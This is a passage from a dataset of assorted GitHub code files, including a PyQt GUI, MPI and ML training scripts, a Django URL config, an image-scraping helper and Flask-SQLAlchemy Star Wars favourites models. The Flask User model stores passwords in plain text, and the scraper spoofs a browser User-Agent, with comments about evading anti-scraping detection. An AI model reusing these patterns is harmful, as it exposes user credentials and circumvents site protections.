self.label.setStyleSheet(\"QLabel{background:white;}\"\r\n                                 \"QLabel{color:rgb(300,300,300,120);font-size:10px;font-weight:bold;font-family:宋体;}\"\r\n                                 )\r\n        pixmap = QPixmap('cloud.png').scaled(self.label.width(), self.label.height())\r\n        #jpg = QtGui.QPixmap(imgName).scaled(self.label2.width(), self.label2.height())\r\n        
self.label.setPixmap(pixmap)\r\n\r\n\r\n        self.label2 = QLabel(self)\r\n        # self.label.setText(\"Display image\")\r\n        self.label2.setFixedSize(230*2, 180*2)\r\n        self.label2.move(250*2, 50*2)\r\n        self.label2.setStyleSheet(\"QLabel{background:white;}\"\r\n                                  \"QLabel{color:rgb(300,300,300,120);font-size:10px;font-weight:bold;font-family:宋体;}\"\r\n                                  )\r\n        pixmap = QPixmap('cloud.png').scaled(self.label2.width(), self.label2.height())\r\n        # jpg = QtGui.QPixmap(imgName).scaled(self.label2.width(), self.label2.height())\r\n        self.label2.setPixmap(pixmap)\r\n\r\n        self.openbt =QPushButton('Open',self)\r\n        self.openbt.move(100*2,250*2)\r\n        self.openbt.clicked.connect(self.openim)\r\n\r\n        self.openbt2 = QPushButton('Open', self)\r\n        self.openbt2.move(320*2, 250*2)\r\n        self.openbt2.clicked.connect(self.openim2)\r\n\r\n\r\n\r\n        # self.show()\r\n    def say_hi(self):\r\n        QMessageBox.information(self,'Hi','Nice to see you.')\r\n        sys.exit()\r\n\r\n    def openim(self):\r\n        imgName, imgType = QFileDialog.getOpenFileName(self, \"Open\", \"\", \"*.jpg;;*.png;;All Files(*)\")\r\n        jpg = QtGui.QPixmap(imgName).scaled(self.label.width(), self.label.height())\r\n        #print(imgName)\r\n        setpath(imgName)\r\n        self.label.setPixmap(jpg)\r\n\r\n    def go(self):\r\n        QMessageBox.information(self,'Please wait a sec','AI painter is working hard!')\r\n\r\n    def openim2(self):\r\n        imgName, imgType = QFileDialog.getOpenFileName(self, \"Open\", \"\", \"*.jpg;;*.png;;All Files(*)\")\r\n        jpg = QtGui.QPixmap(imgName).scaled(self.label2.width(), self.label2.height())\r\n        self.label2.setPixmap(jpg)\r\n        setpath2(imgName)\r\n    def barfunc(self):\r\n        v = self.bar.value()\r\n\r\n        v = v*50\r\n        print(v)\r\n        setbeta(v)\r\n\r\n\r\nif __name__ == '__main__':\r\n    app = QApplication(sys.argv)\r\n    yes = GUI()\r\n    yes.show()\r\n    sys.exit(app.exec_())","repo_name":"haoranmeng98/ST_master","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39439317619","text":"# import mpi4py\nfrom mpi4py import MPI\n\n# create the communicator\ncomm = MPI.COMM_WORLD\n\n# get the rank of this process\nrank = comm.Get_rank()\n\n# get the total number of running processes\ntotal = comm.Get_size()\n\n# if my rank is 0, send a message to the processes with ranks 1 through total - 1\nif rank == 0:\n\tpesan = 'pesan'\n\tfor i in range(1, total):\n\t\tcomm.send(pesan, dest=i, tag=i)\n\t\tprint('Rank {} sending:'.format(rank), pesan, ' to ', i)\n\n# otherwise, receive the message sent by the process with rank 0\nelse:\n\tpesan = comm.recv(source=0, tag=rank)\n\tprint('Rank {} received:'.format(rank), pesan)\n","repo_name":"umarfirja16/SisParTer_tugas_MPI","sub_path":"01.mpi_p2p_terkecil.py","file_name":"01.mpi_p2p_terkecil.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38419917815","text":"from sys import argv, stderr\nfrom generator import *\n\n\ndef read_grammar(file_name):\n    result = None\n    with open(file_name, 'r') as input_file:\n        sequences = [s.rstrip() for s in input_file.readlines()]\n        if len(sequences) > 1:\n            result = sequences\n\n    return result\n\n\ndef main():\n    sequences = read_grammar(argv[1])\n    if sequences:\n        AutoGenerateText(sequences).run()\n    else:\n        print('Invalid input', file=stderr)\n\n\nif __name__ == '__main__':\n    
main()\n","repo_name":"mbv/autogen-grammar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33108273498","text":"from constants import *\nfrom utils import *\nfrom train import evaluate\nfrom tqdm import tqdm\n\n\ncnn_result = read_json(\"output/benchmark/attention/neat_cnn_full_15_extracted.json\")\numls_result = read_json(\"output/benchmark/umls_docs_se.json\")\nadr_result = read_json(\"output/benchmark/adr_docs_se.json\")\ntest_id = read_json(\"data/pod/meta_100/train_test.json\")[\"test\"]\ndoc_ses_map = read_json(OUTPUT_DOC_SE_MAP_PATH)\ndoc_drug_map = read_json(OUTPUT_DOC_DRUG_MAP_PATH)\ndrug_se_map = read_json(OUTPUT_DRUG_SE_MAP_PATH)\ndoc_dir = OUTPUT_DOC_DIR\noutput_example_path = \"examples.json\"\n\nexamples = {}\n\nfor doc_id in tqdm(test_id, desc=\"Extracting examples\"):\n if doc_id not in cnn_result or len(cnn_result[doc_id]) == 0:\n continue\n if doc_id not in umls_result or len(umls_result[doc_id]) == 0:\n continue\n if doc_id not in adr_result or len(adr_result[doc_id]) == 0:\n continue\n true_ses = doc_ses_map[doc_id]\n cnn_output = evaluate([true_ses], [cnn_result[doc_id]], num_labels=0, vector=False)\n cnn_precision = cnn_output[\"precision\"]\n umls_output = evaluate([true_ses], [umls_result[doc_id]], num_labels=0, vector=False)\n umls_precision = umls_output[\"precision\"]\n adr_output = evaluate([true_ses], [adr_result[doc_id]], num_labels=0, vector=False)\n adr_precision = adr_output[\"precision\"]\n if cnn_precision > adr_precision > umls_precision:\n doc_path = os.path.join(doc_dir, \"{}.json\".format(doc_id))\n doc_content = read_json(doc_path)\n drugs = doc_drug_map[doc_id]\n drug_se = {drug: drug_se_map[drug] for drug in drugs}\n examples[doc_id] = {\n \"truth\": drug_se,\n \"cnn\": (cnn_result[doc_id], cnn_precision),\n \"umls\": (umls_result[doc_id], umls_precision),\n \"adr\": (adr_result[doc_id], adr_precision),\n \"doc_content\": doc_content\n }\nwrite_json(examples, output_example_path)\n","repo_name":"nguyenvanhoang7398/NEAT","sub_path":"extract_attn.py","file_name":"extract_attn.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72705395947","text":"from agent.agent import Agent as BaseAgent\nfrom numpy.random import rand\nimport numpy as np\n\npred_ret_shape = [(1, 162), (1, 162), (1, 162)]\nlstm_cell_shape = [(1, 16), (1, 16)]\n\n\nclass Agent(BaseAgent):\n \"\"\"\n random agent\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n kwargs[\"rule_only\"] = True\n super().__init__(*args, **kwargs)\n\n def _predict_process(self, features, frame_state, runtime_ids):\n pred_ret = []\n for shape in pred_ret_shape:\n pred_ret.append(rand(*shape).astype(\"float32\"))\n lstm_info = []\n for shape in lstm_cell_shape:\n lstm_info.append(np.zeros(shape).astype(\"float32\"))\n\n return pred_ret, lstm_info\n","repo_name":"tencent-ailab/hok_env","sub_path":"aiarena/3v3/actor/agent/random_agent.py","file_name":"random_agent.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":498,"dataset":"github-code","pt":"37"} +{"seq_id":"16500633136","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the bonAppetit function below.\ndef bonAppetit(bill, k, b):\n result = \"Bon Appetit\"\n\n eaten = bill.copy()\n 
eaten.pop(k)  # drop the item Anna didn't eat (pop by index, not remove by value)\n\n    annaSum = sum(eaten) / 2\n\n    if (annaSum != b):\n        print(int(b-annaSum))\n    else:\n        print(result)\n\nif __name__ == '__main__':\n    nk = input().rstrip().split()\n\n    n = int(nk[0])\n\n    k = int(nk[1])\n\n    bill = list(map(int, input().rstrip().split()))\n\n    b = int(input().strip())\n\n    bonAppetit(bill, k, b)\n","repo_name":"sebastianczech/HackerRank-Solutions","sub_path":"python/bon-appetit.py","file_name":"bon-appetit.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34693893998","text":"from typing import Dict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\ndef data_to_df(results: Dict) -> pd.DataFrame:\n    rows = []\n    for cpu_load, l_results in results.items():\n        for bench_type, bench_results in l_results.items():\n            for i, sample in enumerate(bench_results):\n                rows.append((bench_type, cpu_load, i, sample))\n\n    df = pd.DataFrame(rows, columns=['benchmark', 'cpu_load',\n                                     'sample_idx', 'rtt'])\n    return df.set_index(['benchmark', 'cpu_load', 'sample_idx'])\n\n\ndef plot_results(results: pd.DataFrame) -> None:\n    data = results.reset_index()\n\n    fig, ax = plt.subplots()\n\n    bench_types = ['base', 'proxy', 'tcpdump']\n    init_capsize = 5\n    markers = ['o', '^', 'v']\n\n    sample_sz = 1000\n    z = 1.96\n\n    cpu_loads = data['cpu_load'].unique()\n\n    # add extra legend\n    ax.plot([], [], ' ', label='Errorbars indicate 95% confidence interval.')\n\n    for i, (btype, mrkr) in enumerate(zip(bench_types, markers)):\n        rtt_means = np.empty(len(cpu_loads))\n        rtt_stds = np.empty(len(cpu_loads))\n        conf_intervals = np.empty(len(cpu_loads))\n        for j, load in enumerate(cpu_loads):\n            sample = np.random.choice(\n                data[(data['benchmark'] == btype) &\n                     (data['cpu_load'] == load)]['rtt'],\n                size=sample_sz, replace=False)\n            rtt_means[j] = sample.mean()\n            rtt_stds[j] = sample.std()\n            conf_intervals[j] = z * (rtt_stds[j] / np.sqrt(sample_sz))\n\n        ax.errorbar(\n            cpu_loads * 100.0,\n            rtt_means,\n            yerr=conf_intervals,\n            marker=mrkr,\n            label=btype.upper(),\n            capsize=5 + (i * init_capsize)\n        )\n\n    ax.set_xlabel('Additional CPU Load [%]')\n    ax.set_ylabel('Avg. 
Total Round-trip Time [ms]')\n # ax.set_ylim([23, 27.5])\n ax.legend()\n\n fig.savefig('results.png')\n plt.show()\n\n\nif __name__ == '__main__':\n data = pd.read_csv('./results.csv')\n data = data.set_index(['benchmark', 'cpu_load', 'sample_idx'])\n plot_results(data)\n","repo_name":"molguin92/ProxyTCPDumpComparison","sub_path":"postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19756466407","text":"import torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torchvision import datasets, transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom model import Autoencoder\r\nfrom plot import plot_images\r\n\r\nif __name__ == '__main__':\r\n transform = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.5,), (0.5,))\r\n ])\r\n mnist_data = datasets.MNIST(root=\"./data\",\r\n train=True,\r\n transform=transform)\r\n data_loader = DataLoader(dataset=mnist_data,\r\n batch_size=32,\r\n shuffle=True)\r\n\r\n ## Use the following to check if sigmoid or tanh needed\r\n ## as last activation func in model decoder\r\n # data = iter(data_loader)\r\n # imgs, targets = data.next()\r\n # print(torch.min(imgs))\r\n # print(torch.max(imgs))\r\n\r\n model = Autoencoder()\r\n criterion = nn.MSELoss()\r\n optimizer = optim.SGD(model.parameters(), lr=0.002, momentum=0.9, weight_decay=1e-4)\r\n\r\n NUM_EPOCHS = 10\r\n total_loss = 0\r\n outputs = []\r\n for epoch in range(NUM_EPOCHS):\r\n total_loss = 0\r\n for data, _ in data_loader:\r\n optimizer.zero_grad()\r\n rebuilt_data = model(data)\r\n loss = criterion(rebuilt_data, data)\r\n loss.backward()\r\n optimizer.step()\r\n outputs.append((epoch, data, rebuilt_data))\r\n total_loss += loss.detach().item()\r\n print(f\"Epoch: {epoch + 1} | Loss: {total_loss:.2f}\")\r\n\r\n plot_images(outputs, NUM_EPOCHS)\r\n","repo_name":"VigKu/Simple_Autoencoder_Tutorial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"721432075","text":"import logging\nimport mxnet as mx\nimport numpy as np\n\n\nclass RandomNumberQueue(object):\n def __init__(self, pool_size=1000):\n self._pool = np.random.rand(pool_size)\n self._index = 0\n\n def get_sample(self):\n if self._index >= len(self._pool):\n self._pool = np.random.rand(len(self._pool))\n self._index = 0\n self._index += 1\n return self._pool[self._index-1]\n\n\nclass StochasticDepthModule(mx.module.BaseModule):\n \"\"\"Stochastic depth module is a two branch computation: one is actual computing and the\n other is the skip computing (usually an identity map). This is similar to a Residual block,\n except that a random variable is used to randomly turn off the computing branch, in order\n to save computation during training.\n\n Parameters\n ----------\n symbol_compute: Symbol\n The computation branch.\n symbol_skip: Symbol\n The skip branch. Could be None, in which case an identity map will be automatically\n used. Note the two branch should produce exactly the same output shapes.\n data_names: list of str\n Default is `['data']`. Indicating the input names. Note if `symbol_skip` is not None,\n it should have the same input names as `symbol_compute`.\n label_names: list of str\n Default is None, indicating that this module does not take labels.\n death_rate: float\n Default 0. 
The probability of turning off the computing branch.\n \"\"\"\n def __init__(self, symbol_compute, symbol_skip=None,\n data_names=('data',), label_names=None,\n logger=logging, context=mx.context.cpu(),\n work_load_list=None, fixed_param_names=None,\n death_rate=0):\n super(StochasticDepthModule, self).__init__(logger=logger)\n\n self._module_compute = mx.module.Module(\n symbol_compute, data_names=data_names,\n label_names=label_names, logger=logger,\n context=context, work_load_list=work_load_list,\n fixed_param_names=fixed_param_names)\n\n if symbol_skip is not None:\n self._module_skip = mx.module.Module(\n symbol_skip, data_names=data_names,\n label_names=label_names, logger=logger,\n context=context, work_load_list=work_load_list,\n fixed_param_names=fixed_param_names)\n else:\n self._module_skip = None\n\n self._open_rate = 1 - death_rate\n self._gate_open = True\n self._outputs = None\n self._input_grads = None\n self._rnd_queue = RandomNumberQueue()\n\n @property\n def data_names(self):\n return self._module_compute.data_names\n\n @property\n def output_names(self):\n return self._module_compute.output_names\n\n @property\n def data_shapes(self):\n return self._module_compute.data_shapes\n\n @property\n def label_shapes(self):\n return self._module_compute.label_shapes\n\n @property\n def output_shapes(self):\n return self._module_compute.output_shapes\n\n def get_params(self):\n params = self._module_compute.get_params()\n if self._module_skip:\n params = [x.copy() for x in params]\n skip_params = self._module_skip.get_params()\n for a, b in zip(params, skip_params):\n # make sure they do not contain duplicated param names\n assert len(set(a.keys()) & set(b.keys())) == 0\n a.update(b)\n return params\n\n def init_params(self, *args, **kwargs):\n self._module_compute.init_params(*args, **kwargs)\n if self._module_skip:\n self._module_skip.init_params(*args, **kwargs)\n\n def bind(self, *args, **kwargs):\n self._module_compute.bind(*args, **kwargs)\n if self._module_skip:\n self._module_skip.bind(*args, **kwargs)\n\n def init_optimizer(self, *args, **kwargs):\n self._module_compute.init_optimizer(*args, **kwargs)\n if self._module_skip:\n self._module_skip.init_optimizer(*args, **kwargs)\n\n def borrow_optimizer(self, shared_module):\n self._module_compute.borrow_optimizer(shared_module._module_compute)\n if self._module_skip:\n self._module_skip.borrow_optimizer(shared_module._module_skip)\n\n def forward(self, data_batch, is_train=None):\n if is_train is None:\n is_train = self._module_compute.for_training\n\n if self._module_skip:\n self._module_skip.forward(data_batch, is_train=True)\n self._outputs = self._module_skip.get_outputs()\n else:\n self._outputs = data_batch.data\n\n if is_train:\n self._gate_open = self._rnd_queue.get_sample() < self._open_rate\n if self._gate_open:\n self._module_compute.forward(data_batch, is_train=True)\n computed_outputs = self._module_compute.get_outputs()\n for i in range(len(self._outputs)):\n self._outputs[i] += computed_outputs[i]\n\n else: # do expectation for prediction\n self._module_compute.forward(data_batch, is_train=False)\n computed_outputs = self._module_compute.get_outputs()\n for i in range(len(self._outputs)):\n self._outputs[i] += self._open_rate * computed_outputs[i]\n\n def backward(self, out_grads=None):\n if self._module_skip:\n self._module_skip.backward(out_grads=out_grads)\n self._input_grads = self._module_skip.get_input_grads()\n else:\n self._input_grads = out_grads\n\n if self._gate_open:\n 
self._module_compute.backward(out_grads=out_grads)\n            computed_input_grads = self._module_compute.get_input_grads()\n            for i in range(len(self._input_grads)):\n                self._input_grads[i] += computed_input_grads[i]\n\n    def update(self):\n        self._module_compute.update()\n        if self._module_skip:\n            self._module_skip.update()\n\n    def update_metric(self, eval_metric, labels):\n        self._module_compute.update_metric(eval_metric, labels)\n        if self._module_skip:\n            self._module_skip.update_metric(eval_metric, labels)\n\n    def get_outputs(self, merge_multi_context=True):\n        assert merge_multi_context, \"Force merging for now\"\n        return self._outputs\n\n    def get_input_grads(self, merge_multi_context=True):\n        assert merge_multi_context, \"Force merging for now\"\n        return self._input_grads\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/stochastic-depth/sd_module.py","file_name":"sd_module.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"71111485226","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date    : 2019-09-09 06:23:33\n# @Author  : 小戴 (408366645@qq.com)\n# @Link    : http://www.phpet.com/\n# @Version : $Id$\n\nfrom urllib.request import urlretrieve\nimport urllib\nimport os\nimport time\nimport pdb\nimport socket\nimport logging\nimport re\nimport requests\n\ndef logginconfig():\n    logging.basicConfig(level=logging.DEBUG,# log level printed to the console\n                    filename='new.log',\n                    filemode='a',## mode: 'w' or 'a'; 'w' rewrites the log on every run, overwriting the previous log\n                    # 'a' is append mode, which is the default when omitted\n                    format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'# log format\n                    )\n\n\ndef loglist(file,data,mode='a'):\n    f = open(file,mode)\n    f.write(data+\"\\n\")\n    f.close()\ndef download(url,filename):\n    socket.setdefaulttimeout(60)\n    #pdb.set_trace() # execution pauses here automatically\n    try:\n        opener = urllib.request.build_opener()\n        opener.addheaders = [('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n        urllib.request.install_opener(opener)\n        #urlretrieve(url = url,filename = filename)\n        urllib.request.urlretrieve(url = url,filename = filename)\n    except socket.timeout:\n        count = 1\n        while count <= 5:\n            try:\n                urlretrieve(url = url,filename = filename)\n                break\n            except socket.timeout:\n                err_info = 'Reloading for %d time'%count if count == 1 else 'Reloading for %d times'%count\n                print(err_info)\n                print('timeout-url:'+url)\n                count += 1\n        if count > 5:\n            print('url:'+url)\n            print(\"downloading picture failed!\")\n    except Exception as e:\n        print('other-url1:'+url)\n        print('caught an unexpected exception')\n        logging.exception(e)\n        count = 1\n        while count <= 3:\n            try:\n                #urlretrieve(url = url,filename = filename)\n                opener = urllib.request.build_opener()\n                opener.addheaders = [('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n                urllib.request.install_opener(opener)\n                #urlretrieve(url = url,filename = filename)\n                urllib.request.urlretrieve(url = url,filename = filename)\n                break\n            except:\n                err_info = 'caught an unexpected exception: Reloading for %d time'%count if count == 1 else 'caught an unexpected exception: Reloading for %d times'%count\n                print(err_info)\n                count += 1\n            if count > 3:\n                print('other-url2:'+url)\n                print(\"downloading failed!\")\n\n# Download images from the re-encoded URLs\n# def down(outs, folder_path):\n#     global x\n#     for out in outs:\n#         # fetch the newly encoded URL\n#         res = requests.get(out)\n#         # close right away to avoid anti-scraping detection\n#         res.close()\n#         bf = BytesIO()\n#         bf.write(res.content)\n#         img = Image.open(bf)\n#         print(f'Downloading image {x}')\n#         img.save(folder_path + 
f\"{x}.jpg\")\n#         x += 1\n\n# Re-encode the scraped image source URLs\ndef bianma(results):\n    outs = []\n    for s in results:\n        # use a regex to pick out the Chinese part\n        pattern = re.compile('[\\u4e00-\\u9fa5]+')\n        result = re.search(pattern, s)\n        su = result.group(0)\n        # percent-encode the Chinese part\n        li = urllib.parse.quote(su)\n        # replace the Chinese part of the original URL with the encoded version\n        out = re.sub(pattern, li, s)\n        outs.append(out)\n    # de-duplicate the list while keeping the original order\n    outs_cp = sorted(set(outs), key=outs.index)\n    return outs_cp\n# Crawl the page for image source URLs\ndef crawl(url, header):\n    res = requests.get(url, headers=header)\n    # close right away to avoid anti-scraping detection\n    res.close()\n    res = res.text\n    pattern = re.compile('http.*?apic.*?jpg')\n    result = re.findall(pattern, res)\n    return result\n","repo_name":"daiwy1016/python-spider","sub_path":"python_lib/BaseCommon.py","file_name":"BaseCommon.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7130432301","text":"\"\"\"main_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nurlpatterns = [\n    path(\"\", views.IndexView.as_view(), name=\"home\"),\n    path(\"3-months/\", views.month_3.as_view(), name=\"m3\"),\n    path(\"6-months/\", views.month_6.as_view(), name=\"m6\"),\n    path(\"9-months/\", views.month_9.as_view(), name=\"m9\"),\n    path('admin/', admin.site.urls),\n    path(\"accounts/\", include(\"accounts.urls\"), name=\"accounts\"),\n    path('accounts/', include(\"django.contrib.auth.urls\")),\n    path(\"expense/\", include(\"expense.urls\"), name=\"expense\"),\n    path(\"income/\", include(\"income.urls\"), name=\"income\"),\n    path(\"transaction/\", include(\"transaction.urls\"), name=\"transaction\")\n]\nurlpatterns += staticfiles_urlpatterns()\n","repo_name":"MjRauff/user_app","sub_path":"main_project/main_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24997423001","text":"from flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.security import safe_str_cmp\n\ndb = SQLAlchemy()\n\n### user: one-to-many (characters, vehicles and planets FAVS)\nclass User(db.Model):\n    __tablename__ = 'users'\n    id = db.Column(db.Integer, primary_key=True)\n    username = db.Column(db.String(100), nullable=False, unique=True)\n    password = db.Column(db.String(100), nullable=False)\n\n    favorites = db.relationship('Favorites', cascade = 'all, delete', backref = 'user', uselist = False)\n\n    ## method to save to the database\n    def save(self):\n        db.session.add(self)\n        db.session.commit()\n    # update the user in the database\n    def update(self):\n        db.session.commit()\n    # delete from the database\n    def delete(self):\n        db.session.delete(self)\n        db.session.commit()\n\n    def check_password(self, password):\n        # constant-time comparison of the stored and provided passwords\n        return safe_str_cmp(self.password, password)\n\n    # returns this python object as a serializable object\n    def serialize(self):\n        return 
{\n            \"id\": self.id,\n            \"username\": self.username,\n            # the password is omitted for privacy reasons\n        }\n\n    ## CONNECTION TO ALL FAVORITES \n    def serialize_user_with_favorite(self):\n        return {\n            \"id\": self.id,\n            \"username\": self.username,\n            \"favorites\": {\n                \"characters\": self.favorites.characters.serialize(),\n                \"planets\": self.favorites.planets.serialize(),\n                \"vehicles\": self.favorites.vehicles.serialize()\n            }\n        }\n\n########\n\n\n\n\n# GENERAL FAVORITES TABLE\nclass Favorites(db.Model):\n    __tablename__ = 'favorites'\n    ## TABLE ID\n    id = db.Column(db.Integer, primary_key=True)\n    users_id = db.Column(db.Integer, db.ForeignKey('users.id', ondelete='CASCADE'), nullable=False)\n\n    ## RELATIONSHIP FROM THE ALL_FAVS TABLE TO THE PIVOT TABLES FOR CHARACTERS, PLANETS AND VEHICLES\n    characters = db.relationship('Characters', secondary='favorites_characters')\n    planets = db.relationship('Planets', secondary='favorites_planets')\n    vehicles = db.relationship('Vehicles', secondary='favorites_vehicles')\n\n    def save(self):\n        db.session.add(self)\n        db.session.commit()\n\n    def update(self):\n        db.session.commit()\n\n    def delete(self):\n        db.session.delete(self)\n        db.session.commit()\n\n    def serialize(self):\n        return {\n            \"id\": self.id,\n            \"user\": {\n                \"id\":self.user.id,\n                \"username\": self.user.username\n            },\n            \"characters\": self.get_fav_characters(),\n            \"planets\": self.get_fav_planets(),\n            \"vehicles\": self.get_fav_vehicles()\n        }\n    \n    def get_fav_characters(self):\n        return list(map(lambda characters: characters.serialize(), self.characters))\n    \n    def get_fav_planets(self):\n        return list(map(lambda planets: planets.serialize(), self.planets))\n\n    def get_fav_vehicles(self):\n        return list(map(lambda vehicles: vehicles.serialize(), self.vehicles)) \n\n\n\n######### ------<\n\n\n\n#######\n# PIVOT TABLES\nclass Favorites_Characters(db.Model):\n    __tablename__ = 'favorites_characters'\n    id_favorites = db.Column(db.Integer, db.ForeignKey('favorites.id'), primary_key=True)\n    characters_id = db.Column(db.Integer, db.ForeignKey('characters.id'), primary_key=True)\n\n########\n\nclass Favorites_Planets(db.Model):\n    __tablename__ = 'favorites_planets'\n    id_favorites = db.Column(db.Integer, db.ForeignKey('favorites.id'), primary_key=True)\n    planets_id = db.Column(db.Integer, db.ForeignKey('planets.id'), primary_key=True)\n    \n###########\n\nclass Favorites_Vehicles(db.Model):\n    __tablename__ = 'favorites_vehicles'\n    id_favorites = db.Column(db.Integer, db.ForeignKey('favorites.id'), primary_key=True)\n    vehicles_id = db.Column(db.Integer, db.ForeignKey('vehicles.id'), primary_key=True)\n\n########\n\n\n\n\n## >--------\n# MANY CHARACTERS\nclass Characters(db.Model):\n    __tablename__ = 'characters'\n    id = db.Column(db.Integer, primary_key=True) \n    name = db.Column(db.String(250), nullable=False)\n    gender = db.Column(db.String(250), nullable=False)\n    height = db.Column(db.String(250), nullable=False)\n    mass = db.Column(db.String(100), nullable=False)\n    hair_color = db.Column(db.String(250), nullable=False)\n    skin_color = db.Column(db.String(100), nullable=False)\n    eye_color = db.Column(db.String(100), nullable=False)\n    birth_year = db.Column(db.String(100), nullable=False)\n    homeworld = db.Column(db.String(100), nullable=False)\n    # link to the pivot table\n    favorites = db.relationship('Favorites', secondary='favorites_characters', backref='character')\n\n    def save(self):\n        db.session.add(self)\n        db.session.commit()\n\n    def update(self):\n        db.session.commit()\n\n    def delete(self):\n        db.session.delete(self)\n        
db.session.commit()\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"gender\": self.gender,\n \"height\": self.height,\n \"mass\": self.mass,\n \"hair_color\": self.hair_color,\n \"skin_color\": self.skin_color,\n \"eye_color\": self.eye_color,\n \"birth_year\": self.birth_year,\n \"homeworld\": self.homeworld,\n }\n#########\n\n\n########\nclass Planets(db.Model):\n __tablename__ = 'planets'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n diameter = db.Column(db.String(250), nullable=False)\n rotation_period = db.Column(db.String(100), nullable=False)\n orbital_period = db.Column(db.String(100), nullable=False)\n gravity = db.Column(db.String(100), nullable=False)\n population = db.Column(db.String(250), nullable=False)\n climate = db.Column(db.String(250), nullable=False)\n terrain = db.Column(db.String(250), nullable=False)\n surface_water = db.Column(db.String(100), nullable=False)\n favorites = db.relationship('Favorites', secondary='favorites_planets', backref='planet')\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"diameter\": self.diameter,\n \"rotation_period\": self.rotation_period,\n \"orbital_period\": self.orbital_period,\n \"gravity\": self.gravity,\n \"population\": self.population,\n \"climate\": self.climate,\n \"terrain\": self.terrain,\n \"surface_water\": self.surface_water,\n }\n#########\n\nclass Vehicles(db.Model):\n __tablename__ = 'vehicles'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n model = db.Column(db.String(250), nullable=False)\n starship_class = db.Column(db.String(250), nullable=False)\n manufacturer = db.Column(db.String(250), nullable=False)\n cost_in_credits = db.Column(db.String(250), nullable=False)\n length = db.Column(db.String(250), nullable=False)\n crew = db.Column(db.String(250), nullable=False)\n passengers = db.Column(db.String(250), nullable=False)\n max_armosphering_speed = db.Column(db.String(250), nullable=False)\n hyperdrive_rating = db.Column(db.String(250), nullable=False)\n cargo_capacity = db.Column(db.String(250), nullable=False)\n consumables = db.Column(db.String(250), nullable=False)\n pilots = db.Column(db.String(250), nullable=False)\n favorites = db.relationship('Favorites', secondary='favorites_vehicles', backref='vehicle')\n\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"model\": self.model,\n \"starship_class\": self.starship_class,\n \"manufacturer\": self.manufacturer,\n \"cost_in_credits\": self.cost_in_credits,\n \"length\": self.length,\n \"passengers\": self.passengers,\n \"max_armosphering_speed\": self.max_armosphering_speed,\n \"hyperdrive_rating\": self.hyperdrive_rating,\n \"cargo_capacity\": self.cargo_capacity,\n \"consumables\": self.consumables,\n \"pilots\": self.pilots,\n 